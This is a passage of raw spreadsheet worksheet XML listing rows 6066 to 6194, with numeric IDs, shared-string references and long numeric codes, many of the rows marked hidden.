        <v>14214</v>
      </c>
      <c r="C6066">
        <v>220100791739</v>
      </c>
    </row>
    <row r="6067" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6067">
        <v>4957</v>
      </c>
      <c r="B6067" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6068" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6068">
        <v>4924</v>
      </c>
      <c r="B6068" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6069" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6069">
        <v>4925</v>
      </c>
      <c r="B6069" t="s">
        <v>14203</v>
      </c>
      <c r="C6069">
        <v>33349713215000</v>
      </c>
    </row>
    <row r="6070" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6070">
        <v>292</v>
      </c>
      <c r="B6070" t="s">
        <v>14214</v>
      </c>
      <c r="C6070">
        <v>8120003890563</v>
      </c>
    </row>
    <row r="6071" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6071">
        <v>4958</v>
      </c>
      <c r="B6071" t="s">
        <v>14214</v>
      </c>
      <c r="C6071">
        <v>9120302490768</v>
      </c>
    </row>
    <row r="6072" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6072">
        <v>4959</v>
      </c>
      <c r="B6072" t="s">
        <v>14214</v>
      </c>
      <c r="C6072">
        <v>9120209351033</v>
      </c>
    </row>
    <row r="6073" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6073">
        <v>4960</v>
      </c>
      <c r="B6073" t="s">
        <v>14214</v>
      </c>
      <c r="C6073">
        <v>9120304931505</v>
      </c>
    </row>
    <row r="6074" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6074">
        <v>4961</v>
      </c>
      <c r="B6074" t="s">
        <v>14214</v>
      </c>
      <c r="C6074">
        <v>220106601599</v>
      </c>
    </row>
    <row r="6075" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6075">
        <v>4963</v>
      </c>
      <c r="B6075" t="s">
        <v>14214</v>
      </c>
      <c r="C6075">
        <v>220203890543</v>
      </c>
    </row>
    <row r="6076" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6076">
        <v>724</v>
      </c>
      <c r="B6076" t="s">
        <v>14214</v>
      </c>
      <c r="C6076">
        <v>9120203381344</v>
      </c>
    </row>
    <row r="6077" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6077">
        <v>2704</v>
      </c>
      <c r="B6077" t="s">
        <v>14203</v>
      </c>
      <c r="C6077" t="s">
        <v>15902</v>
      </c>
    </row>
    <row r="6078" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6078">
        <v>4964</v>
      </c>
      <c r="B6078" t="s">
        <v>14214</v>
      </c>
      <c r="C6078">
        <v>8120311042039</v>
      </c>
    </row>
    <row r="6079" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6079">
        <v>4965</v>
      </c>
      <c r="B6079" t="s">
        <v>14214</v>
      </c>
      <c r="C6079">
        <v>220009512378</v>
      </c>
    </row>
    <row r="6080" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6080">
        <v>4963</v>
      </c>
      <c r="B6080" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6081" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6081">
        <v>4966</v>
      </c>
      <c r="B6081" t="s">
        <v>14214</v>
      </c>
      <c r="C6081">
        <v>9120100801594</v>
      </c>
    </row>
    <row r="6082" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6082">
        <v>4967</v>
      </c>
      <c r="B6082" t="s">
        <v>14214</v>
      </c>
      <c r="C6082">
        <v>220002692044</v>
      </c>
    </row>
    <row r="6083" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6083">
        <v>4968</v>
      </c>
      <c r="B6083" t="s">
        <v>14214</v>
      </c>
      <c r="C6083">
        <v>9120404750529</v>
      </c>
    </row>
    <row r="6084" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6084">
        <v>29</v>
      </c>
      <c r="B6084" t="s">
        <v>14214</v>
      </c>
      <c r="C6084">
        <v>912031121557</v>
      </c>
    </row>
    <row r="6085" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6085">
        <v>4969</v>
      </c>
      <c r="B6085" t="s">
        <v>14214</v>
      </c>
      <c r="C6085">
        <v>220305132507</v>
      </c>
    </row>
    <row r="6086" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6086">
        <v>916</v>
      </c>
      <c r="B6086" t="s">
        <v>14214</v>
      </c>
      <c r="C6086">
        <v>9120011060059</v>
      </c>
    </row>
    <row r="6087" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6087">
        <v>4970</v>
      </c>
      <c r="B6087" t="s">
        <v>14214</v>
      </c>
      <c r="C6087">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6088" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6088">
        <v>4971</v>
      </c>
      <c r="B6088" t="s">
        <v>14214</v>
      </c>
      <c r="C6088">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6089" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6089">
        <v>4972</v>
      </c>
      <c r="B6089" t="s">
        <v>14214</v>
      </c>
      <c r="C6089">
        <v>220406822093</v>
      </c>
    </row>
    <row r="6090" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6090">
        <v>4973</v>
      </c>
      <c r="B6090" t="s">
        <v>14214</v>
      </c>
      <c r="C6090">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="6091" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6091">
        <v>4974</v>
      </c>
      <c r="B6091" t="s">
        <v>14214</v>
      </c>
      <c r="C6091">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6092" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6092">
        <v>4975</v>
      </c>
      <c r="B6092" t="s">
        <v>14214</v>
      </c>
      <c r="C6092">
        <v>220201182724</v>
      </c>
    </row>
    <row r="6093" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6093">
        <v>4976</v>
      </c>
      <c r="B6093" t="s">
        <v>14214</v>
      </c>
      <c r="C6093">
        <v>9120204731886</v>
      </c>
    </row>
    <row r="6094" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6094">
        <v>4967</v>
      </c>
      <c r="B6094" t="s">
        <v>14203</v>
      </c>
      <c r="C6094" t="s">
        <v>16062</v>
      </c>
    </row>
    <row r="6095" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6095">
        <v>4880</v>
      </c>
      <c r="B6095" t="s">
        <v>14203</v>
      </c>
      <c r="C6095" t="s">
        <v>16063</v>
      </c>
    </row>
    <row r="6096" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6096">
        <v>321</v>
      </c>
      <c r="B6096" t="s">
        <v>14214</v>
      </c>
      <c r="C6096">
        <v>8120210002834</v>
      </c>
    </row>
    <row r="6097" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6097">
        <v>4977</v>
      </c>
      <c r="B6097" t="s">
        <v>14214</v>
      </c>
      <c r="C6097">
        <v>8120007872185</v>
      </c>
    </row>
    <row r="6098" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6098">
        <v>4969</v>
      </c>
      <c r="B6098" t="s">
        <v>14203</v>
      </c>
      <c r="C6098" t="s">
        <v>16064</v>
      </c>
    </row>
    <row r="6099" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6099">
        <v>1107</v>
      </c>
      <c r="B6099" t="s">
        <v>14214</v>
      </c>
      <c r="C6099">
        <v>8120103950469</v>
      </c>
    </row>
    <row r="6100" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6100">
        <v>4978</v>
      </c>
      <c r="B6100" t="s">
        <v>14214</v>
      </c>
      <c r="C6100">
        <v>8120011181279</v>
      </c>
    </row>
    <row r="6101" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6101">
        <v>4954</v>
      </c>
      <c r="B6101" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6102" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6102">
        <v>4979</v>
      </c>
      <c r="B6102" t="s">
        <v>14214</v>
      </c>
      <c r="C6102">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6103" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6103">
        <v>4961</v>
      </c>
      <c r="B6103" t="s">
        <v>14203</v>
      </c>
      <c r="C6103">
        <v>951173327801000</v>
      </c>
    </row>
    <row r="6104" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6104">
        <v>4980</v>
      </c>
      <c r="B6104" t="s">
        <v>14214</v>
      </c>
      <c r="C6104">
        <v>8120006980263</v>
      </c>
    </row>
    <row r="6105" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6105">
        <v>4981</v>
      </c>
      <c r="B6105" t="s">
        <v>14214</v>
      </c>
      <c r="C6105">
        <v>8120006980263</v>
      </c>
    </row>
    <row r="6106" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6106">
        <v>4982</v>
      </c>
      <c r="B6106" t="s">
        <v>14214</v>
      </c>
      <c r="C6106">
        <v>220303391821</v>
      </c>
    </row>
    <row r="6107" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6107">
        <v>4983</v>
      </c>
      <c r="B6107" t="s">
        <v>14214</v>
      </c>
      <c r="C6107">
        <v>220205671485</v>
      </c>
    </row>
    <row r="6108" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6108">
        <v>4984</v>
      </c>
      <c r="B6108" t="s">
        <v>14214</v>
      </c>
      <c r="C6108">
        <v>8120312051279</v>
      </c>
    </row>
    <row r="6109" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6109">
        <v>4985</v>
      </c>
      <c r="B6109" t="s">
        <v>14214</v>
      </c>
      <c r="C6109">
        <v>8120312051279</v>
      </c>
    </row>
    <row r="6110" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6110">
        <v>4986</v>
      </c>
      <c r="B6110" t="s">
        <v>14214</v>
      </c>
      <c r="C6110">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6111" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6111">
        <v>4987</v>
      </c>
      <c r="B6111" t="s">
        <v>14214</v>
      </c>
      <c r="C6111">
        <v>220001801435</v>
      </c>
    </row>
    <row r="6112" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6112">
        <v>4982</v>
      </c>
      <c r="B6112" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6113" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6113">
        <v>4988</v>
      </c>
      <c r="B6113" t="s">
        <v>14214</v>
      </c>
      <c r="C6113">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6114" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6114">
        <v>4989</v>
      </c>
      <c r="B6114" t="s">
        <v>14214</v>
      </c>
      <c r="C6114">
        <v>9120304272382</v>
      </c>
    </row>
    <row r="6115" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6115">
        <v>555</v>
      </c>
      <c r="B6115" t="s">
        <v>14214</v>
      </c>
      <c r="C6115">
        <v>8120103882431</v>
      </c>
    </row>
    <row r="6116" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6116">
        <v>4990</v>
      </c>
      <c r="B6116" t="s">
        <v>14214</v>
      </c>
      <c r="C6116" t="s">
        <v>16065</v>
      </c>
    </row>
    <row r="6117" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6117">
        <v>4978</v>
      </c>
      <c r="B6117" t="s">
        <v>14203</v>
      </c>
      <c r="C6117" t="s">
        <v>16066</v>
      </c>
    </row>
    <row r="6118" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6118">
        <v>4935</v>
      </c>
      <c r="B6118" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6119" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6119">
        <v>4988</v>
      </c>
      <c r="B6119" t="s">
        <v>14203</v>
      </c>
      <c r="C6119" t="s">
        <v>16067</v>
      </c>
    </row>
    <row r="6120" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6120">
        <v>4991</v>
      </c>
      <c r="B6120" t="s">
        <v>14214</v>
      </c>
      <c r="C6120">
        <v>225000991916</v>
      </c>
    </row>
    <row r="6121" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6121">
        <v>965</v>
      </c>
      <c r="B6121" t="s">
        <v>14214</v>
      </c>
      <c r="C6121">
        <v>220003611313</v>
      </c>
    </row>
    <row r="6122" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6122">
        <v>506</v>
      </c>
      <c r="B6122" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6123" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6123">
        <v>4992</v>
      </c>
      <c r="B6123" t="s">
        <v>14214</v>
      </c>
      <c r="C6123">
        <v>220001801435</v>
      </c>
    </row>
    <row r="6124" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6124">
        <v>4993</v>
      </c>
      <c r="B6124" t="s">
        <v>14214</v>
      </c>
      <c r="C6124">
        <v>9120304272382</v>
      </c>
    </row>
    <row r="6125" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6125">
        <v>0</v>
      </c>
      <c r="B6125" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6126" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6126">
        <v>0</v>
      </c>
      <c r="B6126" t="s">
        <v>14214</v>
      </c>
      <c r="C6126">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6127" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6127">
        <v>0</v>
      </c>
      <c r="B6127" t="s">
        <v>14214</v>
      </c>
      <c r="C6127">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6128" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6128">
        <v>0</v>
      </c>
      <c r="B6128" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6129" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6129">
        <v>0</v>
      </c>
      <c r="B6129" t="s">
        <v>14214</v>
      </c>
      <c r="C6129">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6130" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6130">
        <v>0</v>
      </c>
      <c r="B6130" t="s">
        <v>14214</v>
      </c>
      <c r="C6130">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6131" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6131">
        <v>0</v>
      </c>
      <c r="B6131" t="s">
        <v>14214</v>
      </c>
      <c r="C6131">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6132" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6132">
        <v>0</v>
      </c>
      <c r="B6132" t="s">
        <v>14214</v>
      </c>
      <c r="C6132">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6133" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6133">
        <v>0</v>
      </c>
      <c r="B6133" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6134" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6134">
        <v>0</v>
      </c>
      <c r="B6134" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6135" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6135">
        <v>0</v>
      </c>
      <c r="B6135" t="s">
        <v>14214</v>
      </c>
      <c r="C6135">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6136" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6136">
        <v>0</v>
      </c>
      <c r="B6136" t="s">
        <v>14214</v>
      </c>
      <c r="C6136">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6137" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6137">
        <v>0</v>
      </c>
      <c r="B6137" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6138" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6138">
        <v>1216</v>
      </c>
      <c r="B6138" t="s">
        <v>14214</v>
      </c>
      <c r="C6138">
        <v>8120105702565</v>
      </c>
    </row>
    <row r="6139" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6139">
        <v>954</v>
      </c>
      <c r="B6139" t="s">
        <v>14214</v>
      </c>
      <c r="C6139">
        <v>9120200141153</v>
      </c>
    </row>
    <row r="6140" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6140">
        <v>0</v>
      </c>
      <c r="B6140" t="s">
        <v>14214</v>
      </c>
      <c r="C6140">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6141" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6141">
        <v>0</v>
      </c>
      <c r="B6141" t="s">
        <v>14214</v>
      </c>
      <c r="C6141">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6142" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6142">
        <v>0</v>
      </c>
      <c r="B6142" t="s">
        <v>14214</v>
      </c>
      <c r="C6142">
        <v>220703970413</v>
      </c>
    </row>
    <row r="6143" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6143">
        <v>4994</v>
      </c>
      <c r="B6143" t="s">
        <v>14214</v>
      </c>
      <c r="C6143">
        <v>9120205352493</v>
      </c>
    </row>
    <row r="6144" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6144">
        <v>4995</v>
      </c>
      <c r="B6144" t="s">
        <v>14214</v>
      </c>
      <c r="C6144">
        <v>9120304272382</v>
      </c>
    </row>
    <row r="6145" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6145">
        <v>4996</v>
      </c>
      <c r="B6145" t="s">
        <v>14214</v>
      </c>
      <c r="C6145">
        <v>9120304272382</v>
      </c>
    </row>
    <row r="6146" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6146">
        <v>4995</v>
      </c>
      <c r="B6146" t="s">
        <v>14203</v>
      </c>
      <c r="C6146" t="s">
        <v>16068</v>
      </c>
    </row>
    <row r="6147" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6147">
        <v>4997</v>
      </c>
      <c r="B6147" t="s">
        <v>14214</v>
      </c>
      <c r="C6147">
        <v>9120017091292</v>
      </c>
    </row>
    <row r="6148" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6148">
        <v>4998</v>
      </c>
      <c r="B6148" t="s">
        <v>14214</v>
      </c>
      <c r="C6148">
        <v>8120107991289</v>
      </c>
    </row>
    <row r="6149" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6149">
        <v>4999</v>
      </c>
      <c r="B6149" t="s">
        <v>14214</v>
      </c>
      <c r="C6149">
        <v>8120212270961</v>
      </c>
    </row>
    <row r="6150" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6150">
        <v>5000</v>
      </c>
      <c r="B6150" t="s">
        <v>14214</v>
      </c>
      <c r="C6150">
        <v>8120001802818</v>
      </c>
    </row>
    <row r="6151" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6151">
        <v>4996</v>
      </c>
      <c r="B6151" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6152" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6152">
        <v>755</v>
      </c>
      <c r="B6152" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6153" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6153">
        <v>4965</v>
      </c>
      <c r="B6153" t="s">
        <v>14203</v>
      </c>
      <c r="C6153">
        <v>948053079041000</v>
      </c>
    </row>
    <row r="6154" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6154">
        <v>1003</v>
      </c>
      <c r="B6154" t="s">
        <v>14214</v>
      </c>
      <c r="C6154">
        <v>8120211193207</v>
      </c>
    </row>
    <row r="6155" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6155">
        <v>4998</v>
      </c>
      <c r="B6155" t="s">
        <v>14203</v>
      </c>
      <c r="C6155" t="s">
        <v>16069</v>
      </c>
    </row>
    <row r="6156" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6156">
        <v>5001</v>
      </c>
      <c r="B6156" t="s">
        <v>14214</v>
      </c>
      <c r="C6156">
        <v>9120214142453</v>
      </c>
    </row>
    <row r="6157" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6157">
        <v>5002</v>
      </c>
      <c r="B6157" t="s">
        <v>14214</v>
      </c>
      <c r="C6157">
        <v>220006490876</v>
      </c>
    </row>
    <row r="6158" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6158">
        <v>974</v>
      </c>
      <c r="B6158" t="s">
        <v>14214</v>
      </c>
      <c r="C6158">
        <v>9120001222354</v>
      </c>
    </row>
    <row r="6159" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6159">
        <v>4796</v>
      </c>
      <c r="B6159" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6160" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6160">
        <v>5003</v>
      </c>
      <c r="B6160" t="s">
        <v>14214</v>
      </c>
      <c r="C6160">
        <v>220200691177</v>
      </c>
    </row>
    <row r="6161" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6161">
        <v>5002</v>
      </c>
      <c r="B6161" t="s">
        <v>14203</v>
      </c>
      <c r="C6161" t="s">
        <v>16070</v>
      </c>
    </row>
    <row r="6162" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6162">
        <v>761</v>
      </c>
      <c r="B6162" t="s">
        <v>14214</v>
      </c>
      <c r="C6162">
        <v>8120203840613</v>
      </c>
    </row>
    <row r="6163" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6163">
        <v>5004</v>
      </c>
      <c r="B6163" t="s">
        <v>14214</v>
      </c>
      <c r="C6163">
        <v>8120001721627</v>
      </c>
    </row>
    <row r="6164" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6164">
        <v>1182</v>
      </c>
      <c r="B6164" t="s">
        <v>14214</v>
      </c>
      <c r="C6164">
        <v>8120006930063</v>
      </c>
    </row>
    <row r="6165" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6165">
        <v>5005</v>
      </c>
      <c r="B6165" t="s">
        <v>14214</v>
      </c>
      <c r="C6165">
        <v>220109241806</v>
      </c>
    </row>
    <row r="6166" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6166">
        <v>5006</v>
      </c>
      <c r="B6166" t="s">
        <v>14214</v>
      </c>
      <c r="C6166">
        <v>9120504920259</v>
      </c>
    </row>
    <row r="6167" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6167">
        <v>5007</v>
      </c>
      <c r="B6167" t="s">
        <v>14214</v>
      </c>
      <c r="C6167">
        <v>9120006971681</v>
      </c>
    </row>
    <row r="6168" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6168">
        <v>5005</v>
      </c>
      <c r="B6168" t="s">
        <v>14203</v>
      </c>
      <c r="C6168">
        <v>942613431022000</v>
      </c>
    </row>
    <row r="6169" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6169">
        <v>4959</v>
      </c>
      <c r="B6169" t="s">
        <v>14203</v>
      </c>
      <c r="C6169" t="s">
        <v>16071</v>
      </c>
    </row>
    <row r="6170" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6170">
        <v>5008</v>
      </c>
      <c r="B6170" t="s">
        <v>14214</v>
      </c>
      <c r="C6170">
        <v>220205291731</v>
      </c>
    </row>
    <row r="6171" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6171">
        <v>5009</v>
      </c>
      <c r="B6171" t="s">
        <v>14214</v>
      </c>
      <c r="C6171">
        <v>220205291731</v>
      </c>
    </row>
    <row r="6172" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6172">
        <v>5010</v>
      </c>
      <c r="B6172" t="s">
        <v>14214</v>
      </c>
      <c r="C6172">
        <v>9120214142453</v>
      </c>
    </row>
    <row r="6173" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6173">
        <v>5004</v>
      </c>
      <c r="B6173" t="s">
        <v>14203</v>
      </c>
      <c r="C6173">
        <v>13435938901001</v>
      </c>
    </row>
    <row r="6174" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6174">
        <v>4973</v>
      </c>
      <c r="B6174" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6175" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6175">
        <v>5011</v>
      </c>
      <c r="B6175" t="s">
        <v>14214</v>
      </c>
      <c r="C6175">
        <v>8120117050983</v>
      </c>
    </row>
    <row r="6176" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6176">
        <v>5012</v>
      </c>
      <c r="B6176" t="s">
        <v>14214</v>
      </c>
      <c r="C6176">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="6177" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6177">
        <v>5013</v>
      </c>
      <c r="B6177" t="s">
        <v>14214</v>
      </c>
      <c r="C6177">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="6178" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6178">
        <v>5014</v>
      </c>
      <c r="B6178" t="s">
        <v>14214</v>
      </c>
      <c r="C6178" t="s">
        <v>16072</v>
      </c>
    </row>
    <row r="6179" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6179">
        <v>5015</v>
      </c>
      <c r="B6179" t="s">
        <v>14214</v>
      </c>
      <c r="C6179">
        <v>220302350791</v>
      </c>
    </row>
    <row r="6180" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6180">
        <v>1069</v>
      </c>
      <c r="B6180" t="s">
        <v>14214</v>
      </c>
      <c r="C6180">
        <v>8120000910139</v>
      </c>
    </row>
    <row r="6181" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6181">
        <v>1165</v>
      </c>
      <c r="B6181" t="s">
        <v>14214</v>
      </c>
      <c r="C6181">
        <v>8120009802176</v>
      </c>
    </row>
    <row r="6182" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6182">
        <v>5016</v>
      </c>
      <c r="B6182" t="s">
        <v>14214</v>
      </c>
      <c r="C6182">
        <v>9120508753203</v>
      </c>
    </row>
    <row r="6183" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6183">
        <v>5017</v>
      </c>
      <c r="B6183" t="s">
        <v>14214</v>
      </c>
      <c r="C6183">
        <v>223000911882</v>
      </c>
    </row>
    <row r="6184" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6184">
        <v>1067</v>
      </c>
      <c r="B6184" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6185" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6185">
        <v>1067</v>
      </c>
      <c r="B6185" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6186" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6186">
        <v>5018</v>
      </c>
      <c r="B6186" t="s">
        <v>14214</v>
      </c>
      <c r="C6186">
        <v>220205291731</v>
      </c>
    </row>
    <row r="6187" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6187">
        <v>0</v>
      </c>
      <c r="B6187" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6188" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6188">
        <v>0</v>
      </c>
      <c r="B6188" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6189" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6189">
        <v>0</v>
      </c>
      <c r="B6189" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6190" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6190">
        <v>0</v>
      </c>
      <c r="B6190" t="s">
        <v>14214</v>
      </c>
      <c r="C6190">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="6191" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6191">
        <v>0</v>
      </c>
      <c r="B6191" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6192" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6192">
        <v>0</v>
      </c>
      <c r="B6192" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6193" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6193">
        <v>0</v>
      </c>
      <c r="B6193" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6194" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6194">
        <v>0</v>
      </c>
      <c r="B6194" t="s">
        <v>14214</v>
      </c>
